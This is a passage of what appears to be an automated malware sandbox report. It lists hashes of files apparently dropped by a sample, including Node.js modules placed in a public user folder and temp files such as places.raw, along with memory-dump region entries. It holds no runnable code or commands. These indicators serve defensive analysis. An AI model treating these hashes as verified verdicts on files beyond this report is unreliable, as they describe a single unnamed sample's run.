| SHA512 | 7156ee21f581c35c7ed35a70fad938fe6fb96a95269aba8acce3547f6740db56e9c187a5f3794d3dc88a39e3f27b7cceaa80996d744cf5687a2e43af691d647a |
C:\Users\Public\node_modules\archiver\lib\core.js
| MD5 | 58fdd3ded7b5078635957893b3d9506d |
| SHA1 | 6211d3e6cb6e7d634219194118f69a2e8489d374 |
| SHA256 | a8b28e116fef412d7503f7cc4a64b01d3d2f747a493b3d83dd97bd732ffc8b92 |
| SHA512 | b50892a9b5c4f791880fed0ad526b29bb1660e9c87cbc39ccec9a8b36e131b41f0d7d394834f194a93639f8d318187ae53732236205962ef853abe337df69163 |
C:\Users\Public\node_modules\archiver\index.js
| MD5 | 5c25523ae6f999e1276a012928e5b7d2 |
| SHA1 | 41df61d5d7033c643e35e9186c605ed89dadb32d |
| SHA256 | 63e5d45a6b939146c5b43f0379214792acc44771608047b924de0924a788b1dc |
| SHA512 | e5a083b7327a645e7762379b1b015cf8a91f1a1fd41b52f6e501cc18272963c7d094ea9cc4b56b2a43743ff3ea52e52496bda64749fa6dc13c262af2e828fa79 |
C:\Users\Public\node_modules\archiver\package.json
| MD5 | de0d0727bcb9cb188628c9993f48dc8a |
| SHA1 | 451522c1ee7b4f12fc47ad4d11233d3349f158ff |
| SHA256 | 483c44a1c19fc71f1638385a77235b7320666ebd5656cec125de46e8ac0e3f95 |
| SHA512 | 4002622eae7b1dba3019f6a4bfa0607bc9bdcf6e9e9a667429b6513c844aa52665b79ab837969f1d23e02fa302df460c5d92788e281eba33bdfa0c3e3288cee8 |
C:\Users\Public\node_modules\async\dist\async.js
| MD5 | 1257b1d9deaebe158498a18320cb5206 |
| SHA1 | 6658b0192f5224d10475378ee50ce927b8b99f13 |
| SHA256 | caeea733f6f61bb394a1a5f71d8bda604765dcc9aea0f0a9a0e54243a1d4c7e8 |
| SHA512 | 244bb4cc9a386415f1ff15392c92ffab5ceee43b78bada2f9836809b015738347cc781c8ec1eec97dd17d8a00e59d100079f7a6f9fa9790dc84f07ce64754fb1 |
C:\Users\Public\node_modules\async\package.json
| MD5 | 8b25d829d53060e8c855b44bf9f0a163 |
| SHA1 | fba8834d773d13fc6c9c74a1ea3ffd013859d7a1 |
| SHA256 | ed7622386e4427bbdd4eb08c09c0aca9bcc1d739becdfb421b2cd19c76dae308 |
| SHA512 | 43427701fb7eaac7fd06ef99ff86cbf5c2a27d0ca28d5bf95b3b9cb0469b00a39dc81afee2d7d2dcb22ec0aef2dd4cc36e01c241ee507865f31be5377d3d9b2e |
C:\Users\Public\node_modules\balanced-match\index.js
| MD5 | 32722fe5688aa4937b71d77bbd45b026 |
| SHA1 | 12161cfaa33be93568ec9a6fd3d9c357991a6a76 |
| SHA256 | 06e4d0037715251cb3be2b2db063662f555b3538d9e30a9c517a54374d941cbc |
| SHA512 | 3a7f88d7859f65229ed973d2f7694fadf81eb6c904f9fcca7e270b6fd5f54052af57789c2bbbf4f57d9edef2cd7ffcb011f666f43a0d6e3b776e59c5726a941f |
C:\Users\Public\node_modules\balanced-match\package.json
| MD5 | fa13802cf9109f23db7cc107f33cbf0a |
| SHA1 | ef0a0d2fd68c3396309ab54ab08c5f8d362436ea |
| SHA256 | b30c328501dead1870b894ad604405b2284b571c1f12664cdc61d92a2e3397c2 |
| SHA512 | 49ce16a0472608d16e092b06028a854e5c80fbde30006fdbb6088dae91770ef87965a32f6e87247719fb7981fec3debdc2169b9df118d67d656a5378620db9c1 |
memory/760-3116-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/760-3117-0x0000017CCBBA0000-0x0000017CCBBB0000-memory.dmp
memory/760-3118-0x0000017CCBBA0000-0x0000017CCBBB0000-memory.dmp
memory/592-3128-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/592-3129-0x00000179E8E20000-0x00000179E8E30000-memory.dmp
memory/760-3139-0x0000017CEE7E0000-0x0000017CEE8EE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\places.raw
| MD5 | c8f29f611fe42033da4bde2dc431819e |
| SHA1 | 8177371d7093bbb01ccbd9c382497c3261808dbd |
| SHA256 | 6f7cdb109be8bdf25a97b0088e8d5e7ae52aa484500a6875f81dae7c91a2e6a8 |
| SHA512 | cee0c8eb7edb91973f59c89f86706ed153bdeb6fb6cacd4ddb41553b79798b66bc0c0f5a0f502026cab8c09748cea5adc1e91d8c5e2ad4a5c02d5a7e3aaf6b16 |
C:\Users\Admin\AppData\Local\Temp\tmp3109.tmp.dat
| MD5 | dcbcc5168ee247e51677b17c3e3650bb |
| SHA1 | 50556e795d94d737190b800f4ca52b6ada9ff10b |
| SHA256 | 8ea7842c9d2568004ad984a286aa62b6ff787ece4b6287167223f5f875496ea3 |
| SHA512 | 4b6968d5596235c9826c2461197ef5e347f12aac333ec5a03ceb3b1b6cad0e1e39cc59ddda889f8b938999a47f5d17155443ff79974df3559bca42884dc960a0 |
C:\Users\Admin\AppData\Local\Temp\tmp313F.tmp.dat
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
memory/592-3218-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/760-3221-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/5008-3224-0x000001BCDBD40000-0x000001BCDBD92000-memory.dmp
memory/5008-3225-0x000001BCDB240000-0x000001BCDB250000-memory.dmp
memory/2572-3226-0x0000000000400000-0x0000000000416000-memory.dmp
memory/5008-3228-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/2572-3229-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/2572-3230-0x0000000005720000-0x00000000057BC000-memory.dmp
memory/2572-3231-0x0000000005D70000-0x0000000006314000-memory.dmp
memory/2572-3232-0x0000000005950000-0x00000000059E2000-memory.dmp
memory/2572-3233-0x0000000005850000-0x0000000005860000-memory.dmp
memory/2572-3234-0x0000000005930000-0x000000000593A000-memory.dmp
memory/2572-3235-0x0000000005BC0000-0x0000000005C26000-memory.dmp
memory/2572-3236-0x0000000006990000-0x00000000069A8000-memory.dmp
memory/2572-3237-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/2572-3238-0x0000000005850000-0x0000000005860000-memory.dmp
memory/3556-3240-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/3556-3241-0x0000015B36610000-0x0000015B36620000-memory.dmp
memory/3556-3251-0x0000015B36610000-0x0000015B36620000-memory.dmp
memory/4408-3253-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/3556-3256-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/4408-3258-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/2308-3275-0x000001D725740000-0x000001D725750000-memory.dmp
memory/2308-3291-0x000001D72DA40000-0x000001D72DA41000-memory.dmp
memory/2308-3293-0x000001D72DA70000-0x000001D72DA71000-memory.dmp
memory/2308-3294-0x000001D72DA70000-0x000001D72DA71000-memory.dmp
memory/2308-3295-0x000001D72DB80000-0x000001D72DB81000-memory.dmp
memory/1452-3297-0x00007FF8AE070000-0x00007FF8AEB31000-memory.dmp
memory/1452-3298-0x0000028F7EB90000-0x0000028F7EBA0000-memory.dmp
memory/1452-3308-0x0000028F7EB90000-0x0000028F7EBA0000-memory.dmp
memory/1452-3309-0x0000028F7EB90000-0x0000028F7EBA0000-memory.dmp
memory/2320-3311-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/1452-3314-0x00007FF8AE070000-0x00007FF8AEB31000-memory.dmp
memory/2320-3315-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/4984-3318-0x00007FF8AE9D0000-0x00007FF8AF491000-memory.dmp
memory/4984-3328-0x000001E1FFD10000-0x000001E1FFD20000-memory.dmp
memory/4984-3329-0x000001E1FFD10000-0x000001E1FFD20000-memory.dmp
memory/4092-3331-0x0000000074A00000-0x00000000751B0000-memory.dmp
memory/4984-3334-0x00007FF8AE9D0000-0x00007FF8AF491000-memory.dmp
memory/4092-3335-0x0000000074A00000-0x00000000751B0000-memory.dmp